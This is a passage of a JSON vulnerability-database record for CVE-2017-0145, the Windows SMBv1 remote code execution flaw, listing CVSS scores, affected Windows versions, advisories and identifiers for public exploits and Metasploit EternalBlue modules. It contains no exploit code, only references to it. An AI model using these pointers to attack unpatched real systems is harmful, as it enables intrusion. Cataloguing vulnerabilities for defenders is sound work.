["http://www.securityfocus.com/bid/96705", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0145", "http://www.securitytracker.com/id/1037991", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0145", "type": "cve", "viewCount": 5}, "differentElements": ["references"], "edition": 1, "lastseen": "2019-05-29T18:16:45"}, {"bulletin": {"affectedSoftware": [{"name": "microsoft server_message_block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": [], "cvelist": ["CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0146, and CVE-2017-0148.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-02-05T13:14:20", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"], "type": "threatpost"}, {"idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["SMNTC-96705"], "type": "symantec"}, {"idList": ["MS:CVE-2017-0145"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"], "type": "trendmicroblog"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-02-05T13:14:20", "rev": 2, "value": 9.1, "vector": "NONE"}}, "hash": "b84bcd44aca3858b0bb7f2e51999ef6867747f4caf45ff7a0279c2f0b19588f7", "hashmap": [{"hash": "fa45dfd2d3ab3df8318df841cddd6b0c", "key": "title"}, {"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "6e85843f0a1ea97153b93d90b1fbe01c", "key": "cvelist"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "e0539df20e5be3ef177a101df2352a5e", "key": "href"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "bcbed719525ad6e957360150b20c3c47", "key": "affectedSoftware"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "cf496359fbe86c47c00b29590cbc0738", "key": "references"}, {"hash": "01656a0a375c60b2d690e64e9b9d5852", "key": "description"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0145", "id": "CVE-2017-0145", "lastseen": "2020-02-05T13:14:20", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securityfocus.com/bid/96705", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0145", "http://www.securitytracker.com/id/1037991", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0145", "type": "cve", "viewCount": 59}, "differentElements": ["cpe23", "affectedSoftware"], "edition": 3, "lastseen": "2020-02-05T13:14:20"}, {"bulletin": {"affectedConfiguration": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1511"}, {"cpeName": "microsoft:windows_vista", "name": "microsoft windows vista", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:gold:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "vulnerable": false}], "operator": "OR"}], "operator": "AND"}]}, "cvelist": ["CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0146, and CVE-2017-0148.", "edition": 5, "enchantments": {"dependencies": {"modified": "2020-10-03T13:07:29", "references": [{"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"], "type": "threatpost"}, {"idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["SMNTC-96705"], "type": "symantec"}, {"idList": ["MS:CVE-2017-0145"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"], "type": "trendmicroblog"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "exploitation": {"modified": "2020-10-03T13:07:29", "wildExploited": true, "wildExploitedSources": [{"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}]}, "score": {"modified": "2020-10-03T13:07:29", "rev": 2, "value": 9.1, "vector": "NONE"}, "twitter": {"counter": 26, "modified": "2020-10-03T13:07:29", "tweets": [{"link": "https://twitter.com/haisenb3rg/status/1355219896876101633", "text": "Blue - I have just completed this room! Check it out: https://t.co/wl8T2v20v5?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/tajsec0x/status/1352766309558345729", "text": "Blue - I have just completed this room! Check it out: \n/hashtag/eternal?src=hashtag_click blue /hashtag/MS17?src=hashtag_click-010 /hashtag/CVE2017?src=hashtag_click-0144 # CVE-2017-0145 # CVE-2017-0146"}, {"link": "https://twitter.com/0xMando/status/1354504708145213440", "text": "Blue - I have just completed this room! Check it out: https://t.co/CM3xc69bUu?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe I did it mom! /darkstar7471"}, {"link": "https://twitter.com/strudinox/status/1352367654514814976", "text": "Blue - I have just completed this room! Check it out: https://t.co/kUcxTcX0cK?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/DaemonExala/status/1355469648314163201", "text": "Blue - I have just completed this room! Check it out: https://t.co/pRJxaPlaBu?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue /hashtag/MS17?src=hashtag_click-010 /hashtag/CVE2017?src=hashtag_click-0144 /hashtag/CVE?src=hashtag_click-2017-0145 /hashtag/CVE?src=hashtag_click-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/mell0wx/status/1350568935335358464", "text": "Blue - I have just completed this room! Check it out: https://t.co/C1ARvEqI3z?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/Wrth1_/status/1350977622700937217", "text": "Blue - I have just completed this room! Check it out: https://t.co/Obry4AfJD1?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/reason2008/status/1352019208620683266", "text": "Blue - I have just completed this room! Check it out: https://t.co/eudEV3HK2W?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/m3t4ll0rdz/status/1353147857017176069", "text": "Blue - I have just completed this room! Check it out: https://t.co/6r4PlwLHqj?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/CreatureofHabi7/status/1351637620674211841", "text": "Blue - I have just completed this room! Check it out: https://t.co/RchZjhOQvw?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}]}}, "extraReferences": [], "hash": "2de16ce8c1076d817b34239dfd00a586df5971e4a0c0094cb10df6ee7db3bd6a", "hashmap": [{"hash": "fa45dfd2d3ab3df8318df841cddd6b0c", "key": "title"}, {"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "d931342d7091edb0db4db482c531ce39", "key": "cpeConfiguration"}, {"hash": "6e85843f0a1ea97153b93d90b1fbe01c", "key": "cvelist"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "e0539df20e5be3ef177a101df2352a5e", "key": "href"}, {"hash": "e758f8fa39ce9e8de2ffe527ec8b6423", "key": "affectedSoftware"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "dd4a1fba31e29c6988f563bdeb65c80c", "key": "affectedConfiguration"}, {"hash": "0751f4e56f29adf827144e01a128331d", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "cf496359fbe86c47c00b29590cbc0738", "key": "references"}, {"hash": "01656a0a375c60b2d690e64e9b9d5852", "key": "description"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0145", "id": "CVE-2017-0145", "lastseen": "2020-10-03T13:07:29", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securityfocus.com/bid/96705", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0145", "http://www.securitytracker.com/id/1037991", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0145", "type": "cve", "viewCount": 71}, "differentElements": ["extraReferences"], "edition": 5, "lastseen": "2020-10-03T13:07:29"}], "edition": 7, "hashmap": [{"key": "affectedConfiguration", "hash": "dd4a1fba31e29c6988f563bdeb65c80c"}, {"key": "affectedSoftware", "hash": "e758f8fa39ce9e8de2ffe527ec8b6423"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "a173072793578541ea04b7baa0323592"}, {"key": "cpe23", "hash": "0751f4e56f29adf827144e01a128331d"}, {"key": "cpeConfiguration", "hash": "6ac681e59932d7c840205e984b11bad5"}, {"key": "cvelist", "hash": "6e85843f0a1ea97153b93d90b1fbe01c"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "cwe", "hash": "226da5129ffaaee3d5b48e506b957d58"}, {"key": "description", "hash": "01656a0a375c60b2d690e64e9b9d5852"}, {"key": "extraReferences", "hash": "2c23b77afb0f021934f5effbf46ef757"}, {"key": "href", "hash": "e0539df20e5be3ef177a101df2352a5e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "d68798550042e5272198c20ea65d8f01"}, {"key": "published", "hash": "f54a01beedb777f2ca261ddba30cf1a5"}, {"key": "references", "hash": "cf496359fbe86c47c00b29590cbc0738"}, {"key": "reporter", "hash": "029dfc07c499dc142a429cac0a029e99"}, {"key": "title", "hash": "fa45dfd2d3ab3df8318df841cddd6b0c"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "b515c940a420da2f6cc1297c746f108fddabf71fe57fefcd441c37455e5cc7e7", "viewCount": 140, "enchantments": {"dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", 